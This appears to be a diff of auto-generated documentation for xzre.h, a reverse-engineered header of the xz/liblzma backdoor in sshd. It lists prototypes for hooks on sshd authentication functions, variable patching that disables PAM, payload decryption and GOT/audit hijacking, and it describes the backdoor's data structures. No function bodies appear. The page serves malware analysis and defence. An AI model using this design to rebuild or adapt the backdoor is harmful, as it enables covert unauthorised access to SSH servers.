3120  imported_funcs_t *imported_funcs);
+
3121 
+
3141 extern BOOL find_dl_naudit(
+
3142  elf_info_t *dynamic_linker_elf,
+
3143  elf_info_t *libcrypto_elf,
+
3144  backdoor_hooks_data_t *hooks,
+
3145  imported_funcs_t *imported_funcs);
+
3146 
+
3163 extern BOOL find_link_map_l_audit_any_plt(
+
3164  backdoor_data_handle_t *data,
+
3165  ptrdiff_t libname_offset,
+
3166  backdoor_hooks_data_t *hooks,
+
3167  imported_funcs_t *imported_funcs);
+
3168 
+
3184 extern BOOL find_link_map_l_audit_any_plt_bitmask(
+
3185  backdoor_data_handle_t *data,
+
3186  instruction_search_ctx_t *search_ctx);
+
3187 
+
3202 extern BOOL sshd_get_sensitive_data_address_via_xcalloc(
+
3203  u8 *data_start,
+
3204  u8 *data_end,
+
3205  u8 *code_start,
+
3206  u8 *code_end,
+
3207  string_references_t *string_refs,
+
3208  void **sensitive_data_out);
+
3209 
+
3224 extern BOOL sshd_get_sensitive_data_address_via_krb5ccname(
+
3225  u8 *data_start,
+
3226  u8 *data_end,
+
3227  u8 *code_start,
+
3228  u8 *code_end,
+
3229  void **sensitive_data_out,
+
3230  elf_info_t *elf);
+
3231 
+
3241 extern int sshd_get_sensitive_data_score_in_demote_sensitive_data(
+
3242  void *sensitive_data,
+
3243  elf_info_t *elf,
+
3244  string_references_t *refs);
+
3245 
+
3255 extern int sshd_get_sensitive_data_score_in_main(
+
3256  void *sensitive_data,
+
3257  elf_info_t *elf,
+
3258  string_references_t *refs);
+
3259 
+
3269 extern int sshd_get_sensitive_data_score_in_do_child(
+
3270  void *sensitive_data,
+
3271  elf_info_t *elf,
+
3272  string_references_t *refs);
+
3273 
+
3283 extern int sshd_get_sensitive_data_score(
+
3284  void *sensitive_data,
+
3285  elf_info_t *elf,
+
3286  string_references_t *refs);
+
3287 
+
3298 extern BOOL bignum_serialize(
+
3299  u8 *buffer, u64 bufferSize,
+
3300  u64 *pOutSize,
+
3301  const BIGNUM *bn,
+
3302  imported_funcs_t *funcs);
+
3303 
+
3304 
+
3311 extern BOOL sshbuf_bignum_is_negative(struct sshbuf *buf);
+
3312 
+
3322 extern BOOL rsa_key_hash(
+
3323  const RSA *rsa,
+
3324  u8 *mdBuf,
+
3325  u64 mdBufSize,
+
3326  imported_funcs_t *funcs);
+
3327 
+
3337 extern BOOL dsa_key_hash(
+
3338  const DSA *dsa,
+
3339  u8 *mdBuf,
+
3340  u64 mdBufSize,
+
3341  global_context_t *ctx);
+
3342 
+
3353 extern BOOL sha256(
+
3354  const void *data,
+
3355  size_t count,
+
3356  u8 *mdBuf,
+
3357  u64 mdBufSize,
+
3358  imported_funcs_t *funcs);
+
3359 
+
3377 extern BOOL verify_signature(
+
3378  struct sshkey *sshkey,
+
3379  u8 *signed_data,
+
3380  u64 sshkey_digest_offset,
+
3381  u64 signed_data_size,
+
3382  u8 *signature,
+
3383  u8 *ed448_raw_key,
+
3384  global_context_t *global_ctx
+
3385 );
+
3386 
+
3398 extern BOOL sshd_patch_variables(
+
3399  BOOL skip_root_patch,
+
3400  BOOL disable_pam,
+
3401  BOOL replace_monitor_reqtype,
+
3402  int monitor_reqtype,
+
3403  global_context_t *global_ctx
+
3404 );
+
3405 
+
3414 extern BOOL sshd_find_monitor_struct(
+
3415  elf_info_t *elf,
+
3416  string_references_t *refs,
+
3417  global_context_t *ctx
+
3418 );
+
3419 
+
3420 enum SocketMode {
+
3421  DIR_WRITE = 0,
+
3422  DIR_READ = 1
+
3423 };
+
3424 
+
3437 extern BOOL sshd_get_client_socket(
+
3438  global_context_t *ctx,
+
3439  int *pSocket,
+
3440  int socket_index,
+
3441  enum SocketMode socket_direction
+
3442 );
+
3443 
+
3452 extern BOOL sshd_get_usable_socket(int *pSock, int socket_index, libc_imports_t *imports);
+
3453 
+
3462 extern BOOL sshd_get_sshbuf(struct sshbuf *sshbuf, global_context_t *ctx);
+
3463 
+
3473 extern BOOL sshd_kex_sshbuf_get(void *kex, global_context_t *ctx, void **pOutputData, size_t *pOutputSize);
+
3474 
+
3484 extern BOOL is_payload_message(
+
3485  u8 *sshbuf_data,
+
3486  size_t sshbuf_size,
+
3487  size_t *pOutPayloadSize,
+
3488  global_context_t *ctx);
+
3489 
+
3498 extern BOOL decrypt_payload_message(
+
3499  void *payload,
+
3500  size_t payload_size,
+
3501  global_context_t *ctx);
+
3502 
+
3509 extern BOOL check_backdoor_state(global_context_t *ctx);
+
3510 
+
3520 extern int mm_answer_keyallowed_hook(struct ssh *ssh, int sock, struct sshbuf *m);
+
3521 
+
3530 extern int mm_answer_keyverify_hook(struct ssh *ssh, int sock, struct sshbuf *m);
+
3531 
+
3540 extern int mm_answer_authpassword_hook(struct ssh *ssh, int sock, struct sshbuf *m);
+
3541 
+
3550 extern void mm_log_handler_hook(
+
3551  LogLevel level,
+
3552  int forced,
+
3553  const char *msg,
+
3554  void *ctx);
+
3555 
+
3565 extern ssize_t fd_read(
+
3566  int fd,
+
3567  void *buffer,
+
3568  size_t count,
+
3569  libc_imports_t *funcs);
+
3570 
+
3580 extern ssize_t fd_write(
+
3581  int fd,
+
3582  void *buffer,
+
3583  size_t count,
+
3584  libc_imports_t *funcs);
+
3585 
+
3593 extern BOOL contains_null_pointers(
+
3594  void **pointers,
+
3595  unsigned int num_pointers
+
3596 );
+
3597 
+
3606 extern BOOL count_pointers(
+
3607  void **ptrs,
+
3608  u64 *count_out,
+
3609  libc_imports_t *funcs
+
3610 );
+
3611 
+
3620 extern void sshd_log(
+
3621  sshd_log_ctx_t *log_ctx,
+
3622  LogLevel level, const char *fmt, ...);
+
3623 
+
3635 extern BOOL sshd_find_sensitive_data(
+
3636  elf_info_t *sshd,
+
3637  elf_info_t *libcrypto,
+
3638  string_references_t *refs,
+
3639  imported_funcs_t *funcs,
+
3640  global_context_t *ctx);
+
3641 
+
3648 extern u32 resolver_call_count;
+
3649 static_assert(sizeof(resolver_call_count) == 0x4);
+
3650 
+
3651 extern global_context_t *global_ctx;
+
3652 static_assert(sizeof(global_ctx) == 0x8);
+
3653 
+
3660 extern backdoor_hooks_data_t *hooks_data_addr;
+
3661 static_assert(sizeof(hooks_data_addr) == 0x8);
+
3662 
+
3673 extern const ptrdiff_t fake_lzma_allocator_offset;
+
3674 static_assert(sizeof(fake_lzma_allocator_offset) == 0x8);
+
3675 
+
3693 extern fake_lzma_allocator_t fake_lzma_allocator;
+
3694 static_assert(sizeof(fake_lzma_allocator) == 0x20);
+
3695 
+
3704 extern const ptrdiff_t elf_functions_offset;
+
3705 static_assert(sizeof(elf_functions_offset) == 0x8);
+
3706 
+
3719 extern const elf_functions_t elf_functions;
+
3720 static_assert(sizeof(elf_functions) == 0x38);
+
3721 
+
3730 extern const u64 cpuid_random_symbol;
+
3731 static_assert(sizeof(cpuid_random_symbol) == 0x8);
+
3732 
+
3741 extern const u64 tls_get_addr_random_symbol;
+
3742 static_assert(sizeof(tls_get_addr_random_symbol) == 0x8);
+
3743 
+
3752 extern const backdoor_cpuid_reloc_consts_t cpuid_reloc_consts;
+
3753 static_assert(sizeof(cpuid_reloc_consts) == 0x18);
+
3754 
+
3763 extern const backdoor_tls_get_addr_reloc_consts_t tls_get_addr_reloc_consts;
+
3764 static_assert(sizeof(tls_get_addr_reloc_consts) == 0x10);
+
3765 
+
3774 extern const u64 string_mask_data[238];
+
3775 static_assert(sizeof(string_mask_data) == 0x770);
+
3776 
+
3785 extern const u32 string_action_data[1304];
+
3786 static_assert(sizeof(string_action_data) == 0x1460);
+
3787 
+
3788 #include "util.h"
+
3789 #endif
RSA_public_decrypt
int RSA_public_decrypt(int flen, const unsigned char *from, unsigned char *to, RSA *rsa, int padding)
Definition: ssh_patch.c:37
audit_ifaces
Definition: xzre.h:215
auditstate
Definition: xzre.h:184
-
backdoor_cpuid_reloc_consts
Definition: xzre.h:1868
-
backdoor_cpuid_reloc_consts::backdoor_init_stage2_got_offset
ptrdiff_t backdoor_init_stage2_got_offset
offset from the symbol backdoor_init_stage2() to the GOT
Definition: xzre.h:1886
-
backdoor_cpuid_reloc_consts::cpuid_random_symbol_got_offset
ptrdiff_t cpuid_random_symbol_got_offset
offset from the symbol cpuid_random_symbol to the GOT
Definition: xzre.h:1874
-
backdoor_cpuid_reloc_consts::cpuid_got_index
u64 cpuid_got_index
index in the GOT for _cpuid()
Definition: xzre.h:1880
-
backdoor_data_handle
data passed to functions that access the backdoor data
Definition: xzre.h:1548
-
backdoor_data
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1594
-
backdoor_data::libc_imports
libc_imports_t libc_imports
functions imported from libc
Definition: xzre.h:1639
-
backdoor_data::string_refs
string_references_t string_refs
information about resolved string references and the containing functions boundaries
Definition: xzre.h:1644
-
backdoor_data::main_map
struct link_map * main_map
this is for sshd itself
Definition: xzre.h:1599
-
backdoor_data::libc_info
elf_info_t libc_info
ELF context for libc.so.
Definition: xzre.h:1629
-
backdoor_data::libcrypto_info
elf_info_t libcrypto_info
ELF context for libcrypto.so.
Definition: xzre.h:1634
-
backdoor_data::dynamic_linker_info
elf_info_t dynamic_linker_info
ELF context for ld.so.
Definition: xzre.h:1625
-
backdoor_data::main_info
elf_info_t main_info
this is for sshd itself
Definition: xzre.h:1619
-
backdoor_data::import_resolver
lzma_allocator * import_resolver
ELF import resolver (fake LZMA allocator)
Definition: xzre.h:1649
-
backdoor_data::dynamic_linker_map
struct link_map * dynamic_linker_map
this is for ld.so
Definition: xzre.h:1604
-
backdoor_hooks_ctx
Definition: xzre.h:1463
-
backdoor_hooks_data
Definition: xzre.h:1425
-
backdoor_setup_params
Definition: xzre.h:1491
-
backdoor_shared_globals
Definition: xzre.h:1272
-
backdoor_shared_libraries_data
Definition: xzre.h:1670
-
backdoor_shared_libraries_data::EVP_PKEY_set1_RSA_plt
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA_plt() in sshd
Definition: xzre.h:1682
-
backdoor_shared_libraries_data::RSA_get0_key_plt
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key_plt() in sshd
Definition: xzre.h:1687
-
backdoor_shared_libraries_data::RSA_public_decrypt_plt
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:1677
-
backdoor_tls_get_addr_reloc_consts
Definition: xzre.h:1894
-
backdoor_tls_get_addr_reloc_consts::tls_get_addr_plt_offset
ptrdiff_t tls_get_addr_plt_offset
offset from the symbol __tls_get_addr() to the PLT
Definition: xzre.h:1900
-
backdoor_tls_get_addr_reloc_consts::tls_get_addr_random_symbol_got_offset
ptrdiff_t tls_get_addr_random_symbol_got_offset
offset from the symbol tls_get_addr_random_symbol to the GOT
Definition: xzre.h:1906
-
cmd_arguments
Definition: xzre.h:1748
-
dasm_ctx
Definition: xzre.h:656
-
dasm_ctx::flags2
u8 flags2
see InstructionFlags2
Definition: xzre.h:668
-
dasm_ctx::flags
u8 flags
see InstructionFlags
Definition: xzre.h:664
-
dl_tls_index
Definition: xzre.h:2967
-
elf_entry_ctx
Definition: xzre.h:639
-
elf_entry_ctx::symbol_ptr
void * symbol_ptr
points to a symbol in memory will be used to find the GOT value
Definition: xzre.h:644
-
elf_entry_ctx::frame_address
u64 * frame_address
stores the value of __builtin_frame_address(0)-16
Definition: xzre.h:649
-
elf_functions
Definition: xzre.h:1913
-
elf_handles
array of ELF handles
Definition: xzre.h:1508
-
elf_handles::dynamic_linker
elf_info_t * dynamic_linker
ELF context for ld.so.
Definition: xzre.h:1519
-
elf_handles::main
elf_info_t * main
this is for sshd
Definition: xzre.h:1513
-
elf_info
Definition: xzre.h:743
-
elf_info::code_segment_size
u64 code_segment_size
page-aligned virtual size of the first executable ELF segment
Definition: xzre.h:822
-
elf_info::first_vaddr
u64 first_vaddr
virtual address of the first program header
Definition: xzre.h:751
-
elf_info::gnurelro_memsize
u64 gnurelro_memsize
size of the GNU relro segment
Definition: xzre.h:797
-
elf_info::verdef
Elf64_Verdef * verdef
pointer to the EFL symbol versioning (from DT_VERDEF)
Definition: xzre.h:801
-
elf_info::gnu_hash_last_bloom
u32 gnu_hash_last_bloom
last valid bloom value
Definition: xzre.h:839
-
elf_info::dyn
Elf64_Dyn * dyn
pointer to the ELF dynamic segment
Definition: xzre.h:763
-
elf_info::strtab
char * strtab
pointer to the ELF string table
Definition: xzre.h:771
-
elf_info::phdrs
Elf64_Phdr * phdrs
pointer to the ELF program headers array in memory
Definition: xzre.h:755
-
elf_info::gnu_hash_nbuckets
u32 gnu_hash_nbuckets
number of GNU hash buckets (from DT_GNU_HASH)
Definition: xzre.h:835
-
elf_info::elfbase
Elf64_Ehdr * elfbase
pointed to the ELF base address in memory
Definition: xzre.h:747
-
elf_info::e_phnum
u64 e_phnum
copy of the ELF program header count from the ELF header
Definition: xzre.h:759
-
elf_info::plt_relocs
Elf64_Rela * plt_relocs
pointer to the ELF PLT relocations table
Definition: xzre.h:779
-
elf_info::gnurelro_found
BOOL gnurelro_found
whether the loaded ELF contains PT_GNU_RELRO or not which specifies the location and size of a segmen...
Definition: xzre.h:789
-
elf_info::code_segment_start
u64 code_segment_start
page-aligned virtual address of the first executable ELF segment
Definition: xzre.h:817
-
elf_info::verdef_num
u64 verdef_num
number of entries in the symbol versioning table
Definition: xzre.h:805
-
elf_info::gnurelro_vaddr
u64 gnurelro_vaddr
location of the GNU relro segment
Definition: xzre.h:793
-
elf_info::symtab
Elf64_Sym * symtab
pointer to the ELF symbol table
Definition: xzre.h:775
-
elf_info::dyn_num_entries
u64 dyn_num_entries
number of entries in the ELF dynamic segment
Definition: xzre.h:767
-
elf_info::plt_relocs_num
u32 plt_relocs_num
number of entries in the PLT relocation table
Definition: xzre.h:783
-
fake_lzma_allocator
Definition: xzre.h:1943
-
global_context
Definition: xzre.h:1144
-
global_context::lzma_code_end
void * lzma_code_end
liblzma code segment end
Definition: xzre.h:1211
-
global_context::libc_imports
libc_imports_t * libc_imports
pointer to the structure containing resolved libc functions
Definition: xzre.h:1154
-
global_context::STR_ssh_rsa_cert_v01_openssh_com
char * STR_ssh_rsa_cert_v01_openssh_com
location of sshd .rodata string "ssh-rsa-cert-v01@openssh.com"
Definition: xzre.h:1172
-
global_context::disable_backdoor
BOOL disable_backdoor
This flag gets set to TRUE by run_backdoor_commands if any of the validity checks fail,...
Definition: xzre.h:1164
-
global_context::imported_funcs
imported_funcs_t * imported_funcs
pointer to the structure containing resolved OpenSSL functions
Definition: xzre.h:1150
-
global_context::sshd_data_start
void * sshd_data_start
sshd data segment end
Definition: xzre.h:1192
-
global_context::num_shifted_bits
u32 num_shifted_bits
number of bits copied
Definition: xzre.h:1236
-
global_context::sshd_code_start
void * sshd_code_start
sshd code segment start
Definition: xzre.h:1184
-
global_context::sshd_data_end
void * sshd_data_end
sshd data segment start
Definition: xzre.h:1196
-
global_context::STR_rsa_sha2_256
char * STR_rsa_sha2_256
location of sshd .rodata string "rsa-sha2-256"
Definition: xzre.h:1176
-
global_context::sshd_code_end
void * sshd_code_end
sshd code segment end
Definition: xzre.h:1188
-
global_context::lzma_code_start
void * lzma_code_start
liblzma code segment start
Definition: xzre.h:1204
+
backdoor_cpuid_reloc_consts
Definition: xzre.h:1949
+
backdoor_cpuid_reloc_consts::backdoor_init_stage2_got_offset
ptrdiff_t backdoor_init_stage2_got_offset
offset from the symbol backdoor_init_stage2() to the GOT
Definition: xzre.h:1967
+
backdoor_cpuid_reloc_consts::cpuid_random_symbol_got_offset
ptrdiff_t cpuid_random_symbol_got_offset
offset from the symbol cpuid_random_symbol to the GOT
Definition: xzre.h:1955
+
backdoor_cpuid_reloc_consts::cpuid_got_index
u64 cpuid_got_index
index in the GOT for _cpuid()
Definition: xzre.h:1961
+
backdoor_data_handle
data passed to functions that access the backdoor data
Definition: xzre.h:1554
+
backdoor_data
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1600
+
backdoor_data::libc_imports
libc_imports_t libc_imports
functions imported from libc
Definition: xzre.h:1645
+
backdoor_data::string_refs
string_references_t string_refs
information about resolved string references and the containing functions boundaries
Definition: xzre.h:1650
+
backdoor_data::main_map
struct link_map * main_map
this is for sshd itself
Definition: xzre.h:1605
+
backdoor_data::libc_info
elf_info_t libc_info
ELF context for libc.so.
Definition: xzre.h:1635
+
backdoor_data::libcrypto_info
elf_info_t libcrypto_info
ELF context for libcrypto.so.
Definition: xzre.h:1640
+
backdoor_data::dynamic_linker_info
elf_info_t dynamic_linker_info
ELF context for ld.so.
Definition: xzre.h:1631
+
backdoor_data::main_info
elf_info_t main_info
this is for sshd itself
Definition: xzre.h:1625
+
backdoor_data::import_resolver
lzma_allocator * import_resolver
ELF import resolver (fake LZMA allocator)
Definition: xzre.h:1655
+
backdoor_data::dynamic_linker_map
struct link_map * dynamic_linker_map
this is for ld.so
Definition: xzre.h:1610
+
backdoor_hooks_ctx
Definition: xzre.h:1469
+
backdoor_hooks_data
Definition: xzre.h:1431
+
backdoor_setup_params
Definition: xzre.h:1497
+
backdoor_shared_globals
Definition: xzre.h:1278
+
backdoor_shared_libraries_data
Definition: xzre.h:1676
+
backdoor_shared_libraries_data::EVP_PKEY_set1_RSA_plt
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA_plt() in sshd
Definition: xzre.h:1688
+
backdoor_shared_libraries_data::RSA_get0_key_plt
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key_plt() in sshd
Definition: xzre.h:1693
+
backdoor_shared_libraries_data::RSA_public_decrypt_plt
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:1683
+
backdoor_tls_get_addr_reloc_consts
Definition: xzre.h:1975
+
backdoor_tls_get_addr_reloc_consts::tls_get_addr_plt_offset
ptrdiff_t tls_get_addr_plt_offset
offset from the symbol __tls_get_addr() to the PLT
Definition: xzre.h:1981
+
backdoor_tls_get_addr_reloc_consts::tls_get_addr_random_symbol_got_offset
ptrdiff_t tls_get_addr_random_symbol_got_offset
offset from the symbol tls_get_addr_random_symbol to the GOT
Definition: xzre.h:1987
+
cmd_arguments
Definition: xzre.h:1754
+
dasm_ctx
Definition: xzre.h:659
+
dasm_ctx::flags2
u8 flags2
see InstructionFlags2
Definition: xzre.h:671
+
dasm_ctx::flags
u8 flags
see InstructionFlags
Definition: xzre.h:667
+
dl_tls_index
Definition: xzre.h:3029
+
elf_entry_ctx
Definition: xzre.h:642
+
elf_entry_ctx::symbol_ptr
void * symbol_ptr
points to a symbol in memory will be used to find the GOT value
Definition: xzre.h:647
+
elf_entry_ctx::frame_address
u64 * frame_address
stores the value of __builtin_frame_address(0)-16
Definition: xzre.h:652
+
elf_functions
Definition: xzre.h:1994
+
elf_handles
array of ELF handles
Definition: xzre.h:1514
+
elf_handles::dynamic_linker
elf_info_t * dynamic_linker
ELF context for ld.so.
Definition: xzre.h:1525
+
elf_handles::main
elf_info_t * main
this is for sshd
Definition: xzre.h:1519
+
elf_info
Definition: xzre.h:746
+
elf_info::code_segment_size
u64 code_segment_size
page-aligned virtual size of the first executable ELF segment
Definition: xzre.h:825
+
elf_info::first_vaddr
u64 first_vaddr
virtual address of the first program header
Definition: xzre.h:754
+
elf_info::gnurelro_memsize
u64 gnurelro_memsize
size of the GNU relro segment
Definition: xzre.h:800
+
elf_info::verdef
Elf64_Verdef * verdef
pointer to the EFL symbol versioning (from DT_VERDEF)
Definition: xzre.h:804
+
elf_info::gnu_hash_last_bloom
u32 gnu_hash_last_bloom
last valid bloom value
Definition: xzre.h:842
+
elf_info::dyn
Elf64_Dyn * dyn
pointer to the ELF dynamic segment
Definition: xzre.h:766
+
elf_info::strtab
char * strtab
pointer to the ELF string table
Definition: xzre.h:774
+
elf_info::phdrs
Elf64_Phdr * phdrs
pointer to the ELF program headers array in memory
Definition: xzre.h:758
+
elf_info::gnu_hash_nbuckets
u32 gnu_hash_nbuckets
number of GNU hash buckets (from DT_GNU_HASH)
Definition: xzre.h:838
+
elf_info::elfbase
Elf64_Ehdr * elfbase
pointed to the ELF base address in memory
Definition: xzre.h:750
+
elf_info::e_phnum
u64 e_phnum
copy of the ELF program header count from the ELF header
Definition: xzre.h:762
+
elf_info::plt_relocs
Elf64_Rela * plt_relocs
pointer to the ELF PLT relocations table
Definition: xzre.h:782
+
elf_info::gnurelro_found
BOOL gnurelro_found
whether the loaded ELF contains PT_GNU_RELRO or not which specifies the location and size of a segmen...
Definition: xzre.h:792
+
elf_info::code_segment_start
u64 code_segment_start
page-aligned virtual address of the first executable ELF segment
Definition: xzre.h:820
+
elf_info::verdef_num
u64 verdef_num
number of entries in the symbol versioning table
Definition: xzre.h:808
+
elf_info::gnurelro_vaddr
u64 gnurelro_vaddr
location of the GNU relro segment
Definition: xzre.h:796
+
elf_info::symtab
Elf64_Sym * symtab
pointer to the ELF symbol table
Definition: xzre.h:778
+
elf_info::dyn_num_entries
u64 dyn_num_entries
number of entries in the ELF dynamic segment
Definition: xzre.h:770
+
elf_info::plt_relocs_num
u32 plt_relocs_num
number of entries in the PLT relocation table
Definition: xzre.h:786
+
fake_lzma_allocator
Definition: xzre.h:2024
+
global_context
Definition: xzre.h:1150
+
global_context::lzma_code_end
void * lzma_code_end
liblzma code segment end
Definition: xzre.h:1217
+
global_context::libc_imports
libc_imports_t * libc_imports
pointer to the structure containing resolved libc functions
Definition: xzre.h:1160
+
global_context::STR_ssh_rsa_cert_v01_openssh_com
char * STR_ssh_rsa_cert_v01_openssh_com
location of sshd .rodata string "ssh-rsa-cert-v01@openssh.com"
Definition: xzre.h:1178
+
global_context::disable_backdoor
BOOL disable_backdoor
This flag gets set to TRUE by run_backdoor_commands if any of the validity checks fail,...
Definition: xzre.h:1170
+
global_context::imported_funcs
imported_funcs_t * imported_funcs
pointer to the structure containing resolved OpenSSL functions
Definition: xzre.h:1156
+
global_context::sshd_data_start
void * sshd_data_start
sshd data segment end
Definition: xzre.h:1198
+
global_context::num_shifted_bits
u32 num_shifted_bits
number of bits copied
Definition: xzre.h:1242
+
global_context::sshd_code_start
void * sshd_code_start
sshd code segment start
Definition: xzre.h:1190
+
global_context::sshd_data_end
void * sshd_data_end
sshd data segment start
Definition: xzre.h:1202
+
global_context::STR_rsa_sha2_256
char * STR_rsa_sha2_256
location of sshd .rodata string "rsa-sha2-256"
Definition: xzre.h:1182
+
global_context::sshd_code_end
void * sshd_code_end
sshd code segment end
Definition: xzre.h:1194
+
global_context::lzma_code_start
void * lzma_code_start
liblzma code segment start
Definition: xzre.h:1210
gnu_hash_table
Definition: xzre.h:192
-
got_ctx
Definition: xzre.h:610
-
got_ctx::return_address
void * return_address
the return address value of the caller obtained from *(u64 *)(caller_locals+24) since the entrypoint ...
Definition: xzre.h:621
-
got_ctx::cpuid_fn
void * cpuid_fn
points to the real cpuid function
Definition: xzre.h:625
-
got_ctx::got_ptr
void * got_ptr
points to the Global Offset Table
Definition: xzre.h:614
-
got_ctx::got_offset
ptrdiff_t got_offset
holds the offset of the symbol relative to the GOT. used to derive the got_ptr
Definition: xzre.h:630
-
imported_funcs
Definition: xzre.h:927
-
imported_funcs::RSA_public_decrypt_plt
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:938
-
imported_funcs::RSA_get0_key_plt
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key() in sshd
Definition: xzre.h:948
-
imported_funcs::EVP_PKEY_set1_RSA_plt
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA() in sshd
Definition: xzre.h:943
-
instruction_search_ctx
Definition: xzre.h:1954
-
instruction_search_ctx::result
BOOL result
TRUE if the instruction sequence was found, FALSE otherwise.
Definition: xzre.h:1980
-
instruction_search_ctx::offset_to_match
u8 * offset_to_match
offset to match in the instruction displacement
Definition: xzre.h:1969
-
instruction_search_ctx::start_addr
u8 * start_addr
start of the code address range to search
Definition: xzre.h:1959
-
instruction_search_ctx::end_addr
u8 * end_addr
start of the code address range to search
Definition: xzre.h:1964
-
instruction_search_ctx::output_register_to_match
u32 * output_register_to_match
register to match as the instruction output
Definition: xzre.h:1974
-
key_ctx
Definition: xzre.h:1848
-
key_payload_body
Definition: xzre.h:1755
-
key_payload_hdr
the payload header. also used as Chacha IV
Definition: xzre.h:1737
-
key_payload
the contents of the RSA 'n' field
Definition: xzre.h:1769
-
ldso_ctx
Definition: xzre.h:1286
-
ldso_ctx::sshd_auditstate_bindflags_ptr
void * sshd_auditstate_bindflags_ptr
the location of sshd's auditstate::bindflags field
Definition: xzre.h:1314
-
ldso_ctx::libcrypto_auditstate_bindflags_old_value
void * libcrypto_auditstate_bindflags_old_value
backup of the old value of libcrypto's libname_list::next field
Definition: xzre.h:1303
-
ldso_ctx::libcrypto_auditstate_bindflags_ptr
void * libcrypto_auditstate_bindflags_ptr
the location of libcrypto's auditstate::bindflags field
Definition: xzre.h:1298
-
ldso_ctx::link_map_l_audit_any_plt_bitmask
u8 link_map_l_audit_any_plt_bitmask
bitmask that sets the link_map::l_audit_any_plt flag
Definition: xzre.h:1335
-
ldso_ctx::_dl_naudit_ptr
unsigned int * _dl_naudit_ptr
location of ld.so's _rtld_global_ro::_dl_naudit_ptr field
Definition: xzre.h:1354
-
ldso_ctx::sshd_auditstate_bindflags_old_value
void * sshd_auditstate_bindflags_old_value
backup of the old value of sshd's libname_list::next field
Definition: xzre.h:1319
-
ldso_ctx::libcrypto_l_name
char ** libcrypto_l_name
location of libcrypto's link_map::l_name field
Definition: xzre.h:1371
-
ldso_ctx::_dl_audit_symbind_alt__size
size_t _dl_audit_symbind_alt__size
code size of ld.so's _dl_audit_symbind_alt() function
Definition: xzre.h:1383
-
ldso_ctx::_dl_audit_ptr
struct audit_ifaces ** _dl_audit_ptr
location of ld.so's _rtld_global_ro::_dl_audit_ptr field
Definition: xzre.h:1345
-
ldso_ctx::sshd_link_map_l_audit_any_plt_addr
void * sshd_link_map_l_audit_any_plt_addr
location of sshd's link_map::l_audit_any_plt flag
Definition: xzre.h:1328
-
libc_imports
Definition: xzre.h:883
+
got_ctx
Definition: xzre.h:613
+
got_ctx::return_address
void * return_address
the return address value of the caller obtained from *(u64 *)(caller_locals+24) since the entrypoint ...
Definition: xzre.h:624
+
got_ctx::cpuid_fn
void * cpuid_fn
points to the real cpuid function
Definition: xzre.h:628
+
got_ctx::got_ptr
void * got_ptr
points to the Global Offset Table
Definition: xzre.h:617
+
got_ctx::got_offset
ptrdiff_t got_offset
holds the offset of the symbol relative to the GOT. used to derive the got_ptr
Definition: xzre.h:633
+
imported_funcs
Definition: xzre.h:930
+
imported_funcs::RSA_public_decrypt_plt
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:941
+
imported_funcs::RSA_get0_key_plt
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key() in sshd
Definition: xzre.h:951
+
imported_funcs::EVP_PKEY_set1_RSA_plt
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA() in sshd
Definition: xzre.h:946
+
instruction_search_ctx
Definition: xzre.h:2035
+
instruction_search_ctx::result
BOOL result
TRUE if the instruction sequence was found, FALSE otherwise.
Definition: xzre.h:2061
+
instruction_search_ctx::offset_to_match
u8 * offset_to_match
offset to match in the instruction displacement
Definition: xzre.h:2050
+
instruction_search_ctx::start_addr
u8 * start_addr
start of the code address range to search
Definition: xzre.h:2040
+
instruction_search_ctx::end_addr
u8 * end_addr
start of the code address range to search
Definition: xzre.h:2045
+
instruction_search_ctx::output_register_to_match
u32 * output_register_to_match
register to match as the instruction output
Definition: xzre.h:2055
+
key_ctx
Definition: xzre.h:1857
+
key_payload_body
Definition: xzre.h:1761
+
key_payload_hdr
the payload header. also used as Chacha IV
Definition: xzre.h:1743
+
key_payload
the contents of the RSA 'n' field
Definition: xzre.h:1775
+
ldso_ctx
Definition: xzre.h:1292
+
ldso_ctx::sshd_auditstate_bindflags_ptr
void * sshd_auditstate_bindflags_ptr
the location of sshd's auditstate::bindflags field
Definition: xzre.h:1320
+
ldso_ctx::libcrypto_auditstate_bindflags_old_value
void * libcrypto_auditstate_bindflags_old_value
backup of the old value of libcrypto's libname_list::next field
Definition: xzre.h:1309
+
ldso_ctx::libcrypto_auditstate_bindflags_ptr
void * libcrypto_auditstate_bindflags_ptr
the location of libcrypto's auditstate::bindflags field
Definition: xzre.h:1304
+
ldso_ctx::link_map_l_audit_any_plt_bitmask
u8 link_map_l_audit_any_plt_bitmask
bitmask that sets the link_map::l_audit_any_plt flag
Definition: xzre.h:1341
+
ldso_ctx::_dl_naudit_ptr
unsigned int * _dl_naudit_ptr
location of ld.so's _rtld_global_ro::_dl_naudit_ptr field
Definition: xzre.h:1360
+
ldso_ctx::sshd_auditstate_bindflags_old_value
void * sshd_auditstate_bindflags_old_value
backup of the old value of sshd's libname_list::next field
Definition: xzre.h:1325
+
ldso_ctx::libcrypto_l_name
char ** libcrypto_l_name
location of libcrypto's link_map::l_name field
Definition: xzre.h:1377
+
ldso_ctx::_dl_audit_symbind_alt__size
size_t _dl_audit_symbind_alt__size
code size of ld.so's _dl_audit_symbind_alt() function
Definition: xzre.h:1389
+
ldso_ctx::_dl_audit_ptr
struct audit_ifaces ** _dl_audit_ptr
location of ld.so's _rtld_global_ro::_dl_audit_ptr field
Definition: xzre.h:1351
+
ldso_ctx::sshd_link_map_l_audit_any_plt_addr
void * sshd_link_map_l_audit_any_plt_addr
location of sshd's link_map::l_audit_any_plt flag
Definition: xzre.h:1334
+
libc_imports
Definition: xzre.h:886
lzma_check_state
Structure to hold internal state of the check being calculated.
Definition: xzre.h:279
lzma_sha256_state
